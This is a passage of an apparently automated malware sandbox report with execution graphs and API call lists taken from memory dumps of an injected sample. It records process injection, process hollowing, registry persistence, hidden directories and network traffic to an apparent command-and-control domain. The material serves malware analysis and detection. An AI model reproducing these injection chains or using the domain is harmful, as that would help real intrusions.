                                                                                                                                                                                          • Source File: 00000000.00000002.1654114084.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2260000_java.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Sleep$HandleModule
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3646095425-0
                                                                                                                                                                                          • Opcode ID: e04edd3b56a3ae2e38138ccc1fa4ca0e34bf568aa8a0740690bb103294f382c8
                                                                                                                                                                                          • Instruction ID: 73ac43c5184fe57861ee2d2da8c26286d91fbebb8d9dd8aa07b7b7b5aede44be
                                                                                                                                                                                          • Opcode Fuzzy Hash: e04edd3b56a3ae2e38138ccc1fa4ca0e34bf568aa8a0740690bb103294f382c8
                                                                                                                                                                                          • Instruction Fuzzy Hash: CAF01C729683509EFB41BFF08C4C66A3AB9AF00B04F0400D0AA89AD0DECF7480D08E75
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:17.9%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:99.8%
                                                                                                                                                                                          Signature Coverage:4%
                                                                                                                                                                                          Total number of Nodes:623
                                                                                                                                                                                          Total number of Limit Nodes:10
                                                                                                                                                                                          execution_graph 3147 2f02535 3148 2f03653 3147->3148 3149 2f0253a ExpandEnvironmentStringsA 3148->3149 3150 2f02553 3149->3150 3151 2f02572 2 API calls 3149->3151 3152 2f025b8 3150->3152 3153 2f025c7 ExpandEnvironmentStringsA 3150->3153 3154 2f0255e 3150->3154 3151->3150 3152->3153 3156 2f025d6 3153->3156 3155 2f02563 lstrcat lstrcat 3154->3155 3154->3156 3157 2f025dd lstrcat 3156->3157 3158 2f025e2 3156->3158 3157->3158 3159 2f0261c 10 API calls 3158->3159 3160 2f0260c 3159->3160 3161 2f02597 10 API calls 3160->3161 3162 2f02634 3161->3162 3045 2f01676 3046 2f01688 3045->3046 3047 2f016ad 3045->3047 3048 2f00de0 3 API calls 3046->3048 3048->3047 3163 2f02f38 3164 2f02f3d 3163->3164 3165 2f02fee send 3164->3165 3166 2f03042 closesocket 3165->3166 3167 2f02ffe 3165->3167 3168 2f03001 send 3167->3168 3169 2f0301e 3167->3169 3168->3166 3168->3167 3170 2f03026 recv 3169->3170 3171 2f03040 3169->3171 3170->3166 3170->3169 3171->3166 3176 2f03e9a 3177 2f03653 3176->3177 3178 2f03e9f GetProcAddress 3177->3178 3179 2f03eaa 3178->3179 3183 2f03ebd 3178->3183 3186 2f03ec3 3179->3186 3180 2f00c9c GetProcAddress 3182 2f03ee4 3180->3182 3205 2f0409a 3182->3205 3183->3180 3187 2f03653 3186->3187 3188 2f03ec8 LoadLibraryA 3187->3188 3189 2f03eee 3188->3189 3190 2f03ed2 3188->3190 3213 2f03f0d 3189->3213 3192 2f00c9c GetProcAddress 3190->3192 3193 2f03ee4 3192->3193 3194 2f0409a 3 API calls 3193->3194 3195 2f03ee9 3194->3195 3195->3183 3196 2f03f03 3197 2f03f3b 3196->3197 3198 2f03f2b GetModuleHandleA 3196->3198 3200 2f03f46 Sleep 3197->3200 3224 2f0401b 3198->3224 3201 2f03f78 3200->3201 3202 2f03f56 Sleep 3201->3202 3203 2f03f78 3202->3203 3204 2f03f66 Sleep 3203->3204 3204->3195 3206 2f0409f 3205->3206 3207 2f01345 3 API calls 3206->3207 3208 2f040bd 3207->3208 3209 2f01345 3 API calls 3208->3209 3210 2f040d6 3209->3210 3211 2f01345 3 API calls 3210->3211 3212 2f03ee9 3211->3212 3214 2f03f12 3213->3214 3215 2f03f3b 3214->3215 3216 2f03f2b GetModuleHandleA 3214->3216 3219 2f03f46 Sleep 3215->3219 3217 2f0401b 3 API calls 3216->3217 3218 2f03f39 3217->3218 3218->3196 3220 2f03f78 3219->3220 3221 2f03f56 Sleep 3220->3221 3222 2f03f78 3221->3222 3223 2f03f66 Sleep 3222->3223 3223->3218 3226 2f0402e 3224->3226 3225 2f04096 3225->3195 3226->3225 3227 2f0409a 3 API calls 3226->3227 3227->3225 3049 2f0487c 3050 2f04897 3049->3050 3053 2f047ef 3050->3053 3052 2f048a5 3054 2f04807 3053->3054 3055 2f04823 3054->3055 3056 2f0276c 19 API calls 3054->3056 3055->3052 3056->3055 3057 2f0495d 3058 2f04970 3057->3058 3059 2f049ae CreateEventA 3058->3059 3060 2f04a63 3058->3060 3061 2f049d1 3059->3061 3061->3060 3062 2f04d53 WaitForSingleObject 3061->3062 3062->3061 3228 2f03e9e 3229 2f03ea1 3228->3229 3230 2f03ec3 13 API calls 3229->3230 3231 2f03ebd 3229->3231 3230->3231 3232 2f00c9c GetProcAddress 3231->3232 3233 2f03ee4 3232->3233 3234 2f0409a 3 API calls 3233->3234 3235 2f03ee9 3234->3235 3023 2f02f3f 3024 2f02f44 3023->3024 3025 2f02f4a lstrlen 3024->3025 3026 2f02f61 3025->3026 3036 2f02f88 3026->3036 3028 2f02f76 3029 2f02fee send 3028->3029 3030 2f03042 closesocket 3029->3030 3031 2f02ffe 3029->3031 3032 2f03001 send 3031->3032 3033 2f0301e 3031->3033 3032->3030 3032->3031 3034 2f03026 recv 3033->3034 3035 2f03040 3033->3035 3034->3030 3034->3033 3035->3030 3037 2f02f8d 3036->3037 3038 2f02fee send 3037->3038 3039 2f03042 closesocket 3038->3039 3040 2f02ffe 3038->3040 3039->3028 3041 2f03001 send 3040->3041 3042 2f0301e 3040->3042 3041->3039 3041->3040 3043 2f03026 recv 3042->3043 3044 2f03040 3042->3044 3043->3039 3043->3042 3044->3039 3236 2f04b01 3238 2f04b14 3236->3238 3237 2f04b4a 3238->3237 3240 2f04c50 3238->3240 3242 2f04c82 3240->3242 3241 2f04cd3 3241->3237 3242->3241 3243 2f026f9 4 API calls 3242->3243 3243->3241 3244 2f03883 3245 2f03888 3244->3245 3250 2f038ce 3245->3250 3247 2f03894 3248 2f02683 4 API calls 3247->3248 3249 2f03913 3248->3249 3251 2f025e8 10 API calls 3250->3251 3252 2f038e8 lstrcat 3251->3252 3253 2f038fe 3252->3253 3254 2f02683 4 API calls 3253->3254 3255 2f03913 3254->3255 3255->3247 2559 2f00b65 2572 2f03653 2559->2572 2561 2f00b6a FindWindowA 2562 2f00b74 GetWindowThreadProcessId OpenProcess 2561->2562 2563 2f00bac 2561->2563 2562->2563 2564 2f00b8e 2562->2564 2579 2f008b3 2563->2579 2574 2f00de0 VirtualAllocEx 2564->2574 2569 2f00b99 2569->2563 2570 2f00ba4 ExitProcess 2569->2570 2573 2f03665 2572->2573 2573->2561 2573->2573 2575 2f00e10 WriteProcessMemory 2574->2575 2576 2f00e45 2574->2576 2575->2576 2577 2f00e2e 2575->2577 2576->2569 2577->2576 2578 2f00e60 CreateRemoteThread 2577->2578 2578->2576 2580 2f008b9 2579->2580 2582 2f008d9 2580->2582 2592 2f00cc4 2582->2592 2647 2f00c3f GetPEB 2592->2647 2594 2f00cc9 2649 2f00c9c 2594->2649 2597 2f014bc 2652 2f014de 2597->2652 2600 2f00c9c GetProcAddress 2601 2f014f9 2600->2601 2668 2f01345 2601->2668 2604 2f01345 3 API calls 2605 2f0152b 2604->2605 2606 2f01345 3 API calls 2605->2606 2607 2f01544 2606->2607 2608 2f01345 3 API calls 2607->2608 2609 2f0155d 2608->2609 2610 2f01345 3 API calls 2609->2610 2611 2f01576 2610->2611 2612 2f01345 3 API calls 2611->2612 2613 2f008ea 2612->2613 2614 2f00643 CreateMutexA 2613->2614 2675 2f0067c 2614->2675 2617 2f00697 2700 2f02597 2617->2700 2618 2f00c9c GetProcAddress 2618->2617 2620 2f006a6 2709 2f006c2 2620->2709 2624 2f006f9 Sleep 2626 2f02501 2624->2626 2625 2f0080f CreateThread 2639 2f00ce8 2625->2639 2864 2f028bd 2625->2864 2627 2f00713 CreateDirectoryA SetFileAttributesA 2626->2627 2727 2f025e8 2627->2727 2630 2f02597 10 API calls 2631 2f00779 CreateDirectoryA SetFileAttributesA 2630->2631 2632 2f0079d VirtualAlloc 2631->2632 2632->2632 2633 2f007b5 2632->2633 2733 2f02683 CreateFileA 2633->2733 2636 2f007f4 2746 2f00811 2636->2746 2640 2f00d03 CreateToolhelp32Snapshot 2639->2640 2640->2640 2641 2f00d12 Sleep Process32First 2640->2641 2642 2f00db5 FindCloseChangeNotification Sleep 2641->2642 2644 2f00d47 2641->2644 2642->2640 2643 2f00d8e Process32Next 2643->2642 2643->2644 2644->2643 2645 2f00de0 3 API calls 2644->2645 2646 2f00d88 FindCloseChangeNotification 2645->2646 2646->2643 2648 2f00c4b 2647->2648 2648->2594 2648->2648 2650 2f00ca2 GetProcAddress 2649->2650 2650->2650 2651 2f008e5 2650->2651 2651->2597 2653 2f014e3 2652->2653 2654 2f00c9c GetProcAddress 2653->2654 2655 2f014f9 2654->2655 2656 2f01345 3 API calls 2655->2656 2657 2f01512 2656->2657 2658 2f01345 3 API calls 2657->2658 2659 2f0152b 2658->2659 2660 2f01345 3 API calls 2659->2660 2661 2f01544 2660->2661 2662 2f01345 3 API calls 2661->2662 2663 2f0155d 2662->2663 2664 2f01345 3 API calls 2663->2664 2665 2f01576 2664->2665 2666 2f01345 3 API calls 2665->2666 2667 2f014d8 2666->2667 2667->2600 2669 2f01358 2668->2669 2670 2f013eb 2668->2670 2669->2670 2671 2f01364 VirtualProtect 2669->2671 2670->2604 2671->2670 2672 2f0137c VirtualAlloc 2671->2672 2672->2672 2673 2f01391 2672->2673 2674 2f013ad VirtualProtect 2673->2674 2674->2670 2676 2f03653 2675->2676 2677 2f00681 LoadLibraryA 2676->2677 2678 2f00c9c GetProcAddress 2677->2678 2679 2f00697 2678->2679 2680 2f02597 10 API calls 2679->2680 2681 2f006a6 2680->2681 2682 2f006c2 86 API calls 2681->2682 2683 2f006b9 lstrcmpiA 2682->2683 2685 2f006f9 Sleep 2683->2685 2686 2f00673 LoadLibraryA 2683->2686 2687 2f02501 2685->2687 2686->2617 2686->2618 2688 2f00713 CreateDirectoryA SetFileAttributesA 2687->2688 2689 2f025e8 10 API calls 2688->2689 2690 2f00746 CreateDirectoryA SetFileAttributesA 2689->2690 2691 2f02597 10 API calls 2690->2691 2692 2f00779 CreateDirectoryA SetFileAttributesA 2691->2692 2693 2f0079d VirtualAlloc 2692->2693 2693->2693 2694 2f007b5 2693->2694 2695 2f02683 4 API calls 2694->2695 2696 2f007cc 2695->2696 2697 2f007f4 2696->2697 2698 2f026f9 4 API calls 2696->2698 2699 2f00811 86 API calls 2697->2699 2698->2697 2699->2686 2766 2f025c6 2700->2766 2702 2f025bb 2703 2f025e6 2702->2703 2704 2f025de lstrcat 2702->2704 2769 2f0261c 2703->2769 2704->2620 2706 2f0260c 2707 2f02597 9 API calls 2706->2707 2708 2f02634 2707->2708 2708->2620 2710 2f006c7 2709->2710 2711 2f006d7 lstrcmpiA 2710->2711 2712 2f006f9 Sleep 2711->2712 2713 2f006b9 lstrcmpiA 2711->2713 2714 2f02501 2712->2714 2713->2624 2713->2625 2715 2f00713 CreateDirectoryA SetFileAttributesA 2714->2715 2716 2f025e8 10 API calls 2715->2716 2717 2f00746 CreateDirectoryA SetFileAttributesA 2716->2717 2718 2f02597 10 API calls 2717->2718 2719 2f00779 CreateDirectoryA SetFileAttributesA 2718->2719 2720 2f0079d VirtualAlloc 2719->2720 2720->2720 2721 2f007b5 2720->2721 2722 2f02683 4 API calls 2721->2722 2723 2f007cc 2722->2723 2724 2f007f4 2723->2724 2725 2f026f9 4 API calls 2723->2725 2726 2f00811 87 API calls 2724->2726 2725->2724 2726->2713 2728 2f025f6 2727->2728 2729 2f0261c 10 API calls 2728->2729 2730 2f0260c 2729->2730 2731 2f02597 10 API calls 2730->2731 2732 2f00746 CreateDirectoryA SetFileAttributesA 2731->2732 2732->2630 2734 2f007cc 2733->2734 2735 2f026a8 GetFileSize 2733->2735 2734->2636 2740 2f026f9 CreateFileA 2734->2740 2736 2f026e9 CloseHandle 2735->2736 2737 2f026c1 2735->2737 2736->2734 2737->2736 2738 2f026c8 ReadFile 2737->2738 2738->2736 2739 2f026e5 2738->2739 2739->2736 2741 2f02768 2740->2741 2742 2f0271f SetFilePointer 2740->2742 2741->2636 2743 2f0275c CloseHandle 2742->2743 2744 2f0273c WriteFile 2742->2744 2743->2741 2744->2743 2745 2f02758 2744->2745 2745->2743 2790 2f0086e 2746->2790 2748 2f008ad 2748->2625 2750 2f00863 2752 2f00866 RegCreateKeyExA 2750->2752 2753 2f008d9 2750->2753 2751 2f008d9 92 API calls 2758 2f008b9 2751->2758 2756 2f00885 RegSetValueExA RegCloseKey 2752->2756 2755 2f00cc4 2 API calls 2753->2755 2757 2f008e5 2755->2757 2756->2748 2759 2f014bc 4 API calls 2757->2759 2758->2751 2760 2f008ea 2759->2760 2761 2f00643 92 API calls 2760->2761 2762 2f008ef CreateThread 2761->2762 2763 2f00ce8 10 API calls 2762->2763 2862 2f028bd 2762->2862 2764 2f0090b 2763->2764 2795 2f0093e 2764->2795 2767 2f03653 2766->2767 2768 2f025cb ExpandEnvironmentStringsA lstrcat 2767->2768 2768->2702 2770 2f03653 2769->2770 2771 2f02621 ExpandEnvironmentStringsA 2770->2771 2772 2f02636 2771->2772 2773 2f0262c 2771->2773 2774 2f0266c lstrcat 2772->2774 2785 2f0265e 2772->2785 2775 2f02597 5 API calls 2773->2775 2777 2f02634 2773->2777 2774->2777 2775->2777 2777->2706 2779 2f026b9 2781 2f026c8 ReadFile 2779->2781 2782 2f026e9 CloseHandle 2779->2782 2780 2f0265d lstrcat 2780->2774 2781->2782 2783 2f026e5 2781->2783 2784 2f026f5 2782->2784 2783->2782 2784->2706 2786 2f03653 2785->2786 2787 2f02663 lstrcat 2786->2787 2788 2f0266c lstrcat 2787->2788 2789 2f02659 2788->2789 2789->2779 2789->2780 2791 2f03653 2790->2791 2792 2f00873 RegCreateKeyExA 2791->2792 2793 2f00885 RegSetValueExA RegCloseKey 2792->2793 2794 2f00840 2793->2794 2794->2748 2794->2750 2794->2758 2796 2f00cc4 2 API calls 2795->2796 2797 2f0094a 2796->2797 2798 2f014bc 4 API calls 2797->2798 2799 2f0094f 2798->2799 2800 2f00954 Sleep RtlExitUserThread OpenMutexA 2799->2800 2801 2f00af1 2800->2801 2802 2f0098f GetStartupInfoA 2800->2802 2801->2764 2818 2f009d9 2802->2818 2805 2f00a3d DuplicateHandle 2806 2f00a82 WriteProcessMemory 2805->2806 2807 2f00aec 2805->2807 2806->2807 2810 2f00ab0 ResumeThread 2806->2810 2831 2f00af3 2807->2831 2808 2f009d7 2814 2f009de CreateProcessA 2808->2814 2809 2f00a3c 2809->2805 2812 2f00ac1 Sleep OpenMutexA 2810->2812 2812->2801 2813 2f00ae7 2812->2813 2813->2807 2813->2812 2814->2807 2815 2f009ee GetThreadContext 2814->2815 2815->2807 2816 2f00a16 VirtualProtectEx 2815->2816 2816->2807 2817 2f00a41 DuplicateHandle 2816->2817 2817->2806 2817->2807 2819 2f03653 2818->2819 2820 2f009de CreateProcessA 2819->2820 2821 2f00aec 2820->2821 2822 2f009ee GetThreadContext 2820->2822 2824 2f00af3 88 API calls 2821->2824 2822->2821 2823 2f00a16 VirtualProtectEx 2822->2823 2823->2821 2825 2f00a41 DuplicateHandle 2823->2825 2826 2f009d2 2824->2826 2825->2821 2827 2f00a82 WriteProcessMemory 2825->2827 2826->2805 2826->2808 2826->2809 2827->2821 2828 2f00ab0 ResumeThread 2827->2828 2829 2f00ac1 Sleep OpenMutexA 2828->2829 2829->2826 2830 2f00ae7 2829->2830 2830->2821 2830->2829 2833 2f00b01 2831->2833 2834 2f00cc4 2 API calls 2833->2834 2835 2f00b0d 2834->2835 2842 2f00b27 2835->2842 2837 2f00b20 2838 2f00b40 2837->2838 2839 2f00c9c GetProcAddress 2837->2839 2841 2f00b57 2838->2841 2849 2f00b65 2838->2849 2839->2838 2843 2f03653 2842->2843 2844 2f00b2c LoadLibraryA 2843->2844 2845 2f00c9c GetProcAddress 2844->2845 2846 2f00b42 2845->2846 2847 2f00b65 95 API calls 2846->2847 2848 2f00b57 2847->2848 2848->2837 2850 2f03653 2849->2850 2851 2f00b6a FindWindowA 2850->2851 2852 2f00b74 GetWindowThreadProcessId OpenProcess 2851->2852 2853 2f00bac 2851->2853 2852->2853 2854 2f00b8e 2852->2854 2855 2f008b3 92 API calls 2853->2855 2857 2f00de0 3 API calls 2854->2857 2856 2f00bb1 2855->2856 2858 2f00c3f GetPEB 2856->2858 2859 2f00b99 2857->2859 2861 2f00bb6 2858->2861 2859->2853 2860 2f00ba4 ExitProcess 2859->2860 2861->2841 2863 2f028cb 2862->2863 3172 2f04d25 3173 2f04d32 3172->3173 3174 2f04d4e 3172->3174 3173->3174 3175 2f04d44 SetEvent 3173->3175 3175->3174 3063 2f048c6 3064 2f048e1 3063->3064 3065 2f047ef 19 API calls 3064->3065 3066 2f048ef 3065->3066 3067 2f031c6 3068 2f031cb 3067->3068 3069 2f02597 10 API calls 3068->3069 3070 2f031e9 lstrcat 3069->3070 3071 2f031f6 3070->3071 3072 2f026f9 4 API calls 3071->3072 3073 2f03218 3072->3073 3074 2f03276 3073->3074 3075 2f0321e GetStartupInfoA CreateProcessA CloseHandle CloseHandle 3073->3075 3075->3074 3076 2f03d46 3077 2f03653 3076->3077 3078 2f03d4b LoadLibraryA 3077->3078 3079 2f00c9c GetProcAddress 3078->3079 3080 2f03d61 3079->3080 3099 2f03d86 3080->3099 3083 2f03da1 3085 2f01345 3 API calls 3083->3085 3084 2f00c9c GetProcAddress 3084->3083 3086 2f03dba 3085->3086 3087 2f01345 3 API calls 3086->3087 3088 2f03dd3 3087->3088 3089 2f01345 3 API calls 3088->3089 3090 2f03dec 3089->3090 3091 2f01345 3 API calls 3090->3091 3092 2f03e05 3091->3092 3093 2f01345 3 API calls 3092->3093 3094 2f03e1e 3093->3094 3095 2f01345 3 API calls 3094->3095 3096 2f03e37 3095->3096 3097 2f01345 3 API calls 3096->3097 3098 2f03e50 3097->3098 3100 2f03653 3099->3100 3101 2f03d8b LoadLibraryA 3100->3101 3102 2f00c9c GetProcAddress 3101->3102 3103 2f03da1 3102->3103 3104 2f01345 3 API calls 3103->3104 3105 2f03dba 3104->3105 3106 2f01345 3 API calls 3105->3106 3107 2f03dd3 3106->3107 3108 2f01345 3 API calls 3107->3108 3109 2f03dec 3108->3109 3110 2f01345 3 API calls 3109->3110 3111 2f03e05 3110->3111 3112 2f01345 3 API calls 3111->3112 3113 2f03e1e 3112->3113 3114 2f01345 3 API calls 3113->3114 3115 2f03e37 3114->3115 3116 2f01345 3 API calls 3115->3116 3117 2f03d7e LoadLibraryA 3116->3117 3117->3083 3117->3084 3118 2f02546 3119 2f02549 3118->3119 3133 2f02572 3119->3133 3121 2f02553 3122 2f025b8 3121->3122 3123 2f025c7 ExpandEnvironmentStringsA 3121->3123 3124 2f0255e 3121->3124 3122->3123 3126 2f025d6 3123->3126 3125 2f02563 lstrcat lstrcat 3124->3125 3124->3126 3127 2f025dd lstrcat 3126->3127 3128 2f025e2 3126->3128 3127->3128 3129 2f0261c 10 API calls 3128->3129 3130 2f0260c 3129->3130 3131 2f02597 10 API calls 3130->3131 3132 2f02634 3131->3132 3134 2f03653 3133->3134 3135 2f02577 lstrcat lstrcat 3134->3135 3135->3121 2865 2f00b6b GetWindowThreadProcessId OpenProcess 2866 2f00bac 2865->2866 2867 2f00b8e 2865->2867 2869 2f008b3 96 API calls 2866->2869 2868 2f00de0 3 API calls 2867->2868 2871 2f00b99 2868->2871 2870 2f00bb1 2869->2870 2872 2f00c3f GetPEB 2870->2872 2871->2866 2873 2f00ba4 ExitProcess 2871->2873 2874 2f00bb6 2872->2874 2875 2f0292d 2876 2f03653 2875->2876 2877 2f02932 LoadLibraryA 2876->2877 2878 2f00c9c GetProcAddress 2877->2878 2879 2f02948 WSAStartup 2878->2879 2879->2879 2880 2f02961 VirtualAlloc 2879->2880 2880->2880 2881 2f02979 2880->2881 2882 2f025e8 10 API calls 2881->2882 2883 2f0298a 2882->2883 2907 2f029a6 2883->2907 2885 2f02a07 2887 2f02a19 lstrcat 2885->2887 2886 2f0299d 2886->2885 2888 2f029ab lstrcat 2886->2888 2889 2f02a20 2887->2889 2890 2f025e8 10 API calls 2888->2890 2891 2f02b4d 6 API calls 2889->2891 2894 2f034f7 19 API calls 2889->2894 2900 2f02a51 2889->2900 2892 2f029c1 2890->2892 2891->2889 2893 2f029dd 55 API calls 2892->2893 2895 2f029d4 2893->2895 2894->2889 2897 2f029e2 lstrcat 2895->2897 2896 2f0343f 34 API calls 2896->2900 2898 2f029f8 2897->2898 2899 2f02a14 49 API calls 2898->2899 2899->2885 2900->2896 2901 2f02683 CreateFileA GetFileSize ReadFile CloseHandle 2900->2901 2902 2f026f9 CreateFileA SetFilePointer WriteFile CloseHandle 2900->2902 2903 2f02a8a DeleteFileA 2900->2903 2904 2f02ace DeleteFileA 2900->2904 2905 2f02b34 Sleep 2900->2905 2906 2f02b1e DeleteFileA 2900->2906 2901->2900 2902->2900 2903->2900 2904->2900 2905->2889 2906->2905 2908 2f03653 2907->2908 2909 2f029ab lstrcat 2908->2909 2910 2f025e8 10 API calls 2909->2910 2911 2f029c1 2910->2911 2930 2f029dd 2911->2930 2913 2f029d4 2914 2f029e2 lstrcat 2913->2914 2915 2f029f8 2914->2915 2916 2f02a14 49 API calls 2915->2916 2917 2f02a0b 2916->2917 2918 2f02a19 lstrcat 2917->2918 2919 2f02a20 2918->2919 2920 2f02b4d 6 API calls 2919->2920 2921 2f034f7 19 API calls 2919->2921 2927 2f02a51 2919->2927 2920->2919 2921->2919 2922 2f0343f 34 API calls 2922->2927 2923 2f02683 CreateFileA GetFileSize ReadFile CloseHandle 2923->2927 2924 2f026f9 CreateFileA SetFilePointer WriteFile CloseHandle 2924->2927 2925 2f02a8a DeleteFileA 2925->2927 2926 2f02ace DeleteFileA 2926->2927 2927->2922 2927->2923 2927->2924 2927->2925 2927->2926 2928 2f02b34 Sleep 2927->2928 2929 2f02b1e DeleteFileA 2927->2929 2928->2919 2929->2928 2931 2f03653 2930->2931 2932 2f029e2 lstrcat 2931->2932 2933 2f029f8 2932->2933 2948 2f02a14 2933->2948 2935 2f02a0b 2936 2f02a19 lstrcat 2935->2936 2937 2f02a20 2936->2937 2938 2f02b4d 6 API calls 2937->2938 2939 2f034f7 19 API calls 2937->2939 2945 2f02a51 2937->2945 2938->2937 2939->2937 2940 2f0343f 34 API calls 2940->2945 2941 2f02683 CreateFileA GetFileSize ReadFile CloseHandle 2941->2945 2942 2f026f9 CreateFileA SetFilePointer WriteFile CloseHandle 2942->2945 2943 2f02a8a DeleteFileA 2943->2945 2944 2f02ace DeleteFileA 2944->2945 2945->2940 2945->2941 2945->2942 2945->2943 2945->2944 2946 2f02b34 Sleep 2945->2946 2947 2f02b1e DeleteFileA 2945->2947 2946->2937 2947->2946 2949 2f03653 2948->2949 2950 2f02a19 lstrcat 2949->2950 2951 2f02a20 2950->2951 2955 2f02a51 2951->2955 2962 2f02b4d 2951->2962 2970 2f034f7 2951->2970 2956 2f02683 CreateFileA GetFileSize ReadFile CloseHandle 2955->2956 2957 2f026f9 CreateFileA SetFilePointer WriteFile CloseHandle 2955->2957 2958 2f02a8a DeleteFileA 2955->2958 2959 2f02ace DeleteFileA 2955->2959 2960 2f02b34 Sleep 2955->2960 2961 2f02b1e DeleteFileA 2955->2961 2973 2f0343f CreateToolhelp32Snapshot 2955->2973 2956->2955 2957->2955 2958->2955 2959->2955 2960->2951 2961->2960 2966 2f02b5e 2962->2966 2963 2f02bd0 inet_addr 2964 2f02be4 gethostbyname 2963->2964 2963->2966 2964->2966 2965 2f02c41 Sleep 2965->2965 2965->2966 2966->2963 2966->2965 2968 2f02c8a 2966->2968 2968->2966 2969 2f02cf7 2968->2969 2986 2f02c99 2968->2986 2969->2951 2992 2f03522 2970->2992 2974 2f034f4 2973->2974 2975 2f0345c Process32First 2973->2975 2974->2955 2976 2f034ed CloseHandle 2975->2976 2977 2f0347d VirtualAlloc 2975->2977 2976->2974 2977->2977 2980 2f03495 2977->2980 2978 2f03497 lstrcat 3013 2f034b0 lstrcat 2978->3013 2980->2978 2981 2f034b0 lstrcat 2980->2981 2983 2f034cc lstrlen 2980->2983 2981->2980 2982 2f034b5 Process32Next 2981->2982 2982->2980 2984 2f0276c 19 API calls 2983->2984 2985 2f034df VirtualFree 2984->2985 2985->2976 2991 2f02b5e 2986->2991 2987 2f02bd0 inet_addr 2988 2f02be4 gethostbyname 2987->2988 2987->2991 2988->2991 2989 2f02cf7 2989->2968 2990 2f02c41 Sleep 2990->2990 2990->2991 2991->2986 2991->2987 2991->2989 2991->2990 2993 2f03527 2992->2993 2996 2f0276c 2993->2996 2995 2f0351a 2997 2f0277d VirtualAlloc 2996->2997 2997->2997 2998 2f02791 2997->2998 2999 2f025e8 10 API calls 2998->2999 3000 2f027be 2999->3000 3007 2f027da 3000->3007 3002 2f027d1 3003 2f027df lstrcat 3002->3003 3004 2f027e6 3003->3004 3005 2f026f9 4 API calls 3004->3005 3006 2f027fd VirtualFree 3004->3006 3005->3004 3006->2995 3008 2f03653 3007->3008 3009 2f027df lstrcat 3008->3009 3010 2f027e6 3009->3010 3011 2f026f9 4 API calls 3010->3011 3012 2f027fd VirtualFree 3010->3012 3011->3010 3012->3002 3014 2f034b5 Process32Next 3013->3014 3015 2f034ad 3013->3015 3014->3015 3015->3013 3016 2f03497 lstrcat 3015->3016 3017 2f034cc lstrlen 3015->3017 3018 2f034b0 19 API calls 3016->3018 3019 2f0276c 19 API calls 3017->3019 3018->3015 3020 2f034df VirtualFree 3019->3020 3021 2f034ed CloseHandle 3020->3021 3022 2f034f4 3021->3022 3022->2980 3136 2f02dcf 3137 2f03653 3136->3137 3138 2f02dd4 CryptAcquireContextA 3137->3138 3139 2f02e91 3138->3139 3140 2f02dee CryptImportPublicKeyInfo 3138->3140 3141 2f02e10 CryptCreateHash 3140->3141 3142 2f02e83 CryptReleaseContext 3140->3142 3143 2f02e33 CryptHashData 3141->3143 3144 2f02e77 CryptDestroyKey 3141->3144 3142->3139 3145 2f02e6b CryptDestroyHash 3143->3145 3146 2f02e4d CryptVerifySignatureA 3143->3146 3144->3142 3145->3144 3146->3145

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 02F02F88 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72networkCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 305 2f02f88-2f02ffc call 2f03653 call 2f03673 call 2f03558 call 2f0363b send 317 2f03042-2f03054 closesocket 305->317 318 2f02ffe 305->318 319 2f03001-2f03015 send 318->319 319->317 320 2f03017-2f0301c 319->320 320->319 321 2f0301e-2f03023 320->321 322 2f03026-2f03038 recv 321->322 322->317 323 2f0303a-2f0303e 322->323 323->322 324 2f03040 323->324 324->317
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • send.WS2_32(?,00000000,00000000,00000000), ref: 02F02FF4
                                                                                                                                                                                          • send.WS2_32(?,02F02A30,02F02A2C,00000000), ref: 02F0300D
                                                                                                                                                                                          • recv.WS2_32(?,02F02A30,00A00000,00000000), ref: 02F03030
                                                                                                                                                                                          • closesocket.WS2_32(?), ref: 02F0304A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: send$closesocketrecv
                                                                                                                                                                                          • String ID: fccfxejgtpqb.pw
                                                                                                                                                                                          • API String ID: 3431254638-3332661483
                                                                                                                                                                                          • Opcode ID: 9574067959f33b04d739d713f0caaf9cbaae1037dcd8482bb700ab3644756bfa
                                                                                                                                                                                          • Instruction ID: 6841f71e62f07134866fad790052884c6829c601e12220bfc7758b285fdd1488
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9574067959f33b04d739d713f0caaf9cbaae1037dcd8482bb700ab3644756bfa
                                                                                                                                                                                          • Instruction Fuzzy Hash: BE216F72B00114ABEB215E28CC84F5A7AE9EF44788F0545D4FF09EB294D735ED109FA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02F00DE0 Relevance: 4.6, APIs: 3, Instructions: 57injectionmemorythreadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualAllocEx.KERNELBASE(?,00000000,00004F37,00003000,00000040,E8FFF41B,?,E900001B,02F00D88,00000000,0000090B,00000000), ref: 02F00E06
                                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(?,-000008D9,00000000,00004F37,00000000), ref: 02F00E24
                                                                                                                                                                                          • CreateRemoteThread.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000), ref: 02F00E70
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
